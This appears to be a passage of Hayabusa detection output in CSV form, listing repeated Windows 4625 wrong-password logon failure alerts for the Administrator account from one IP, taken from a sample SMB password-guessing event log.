+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: 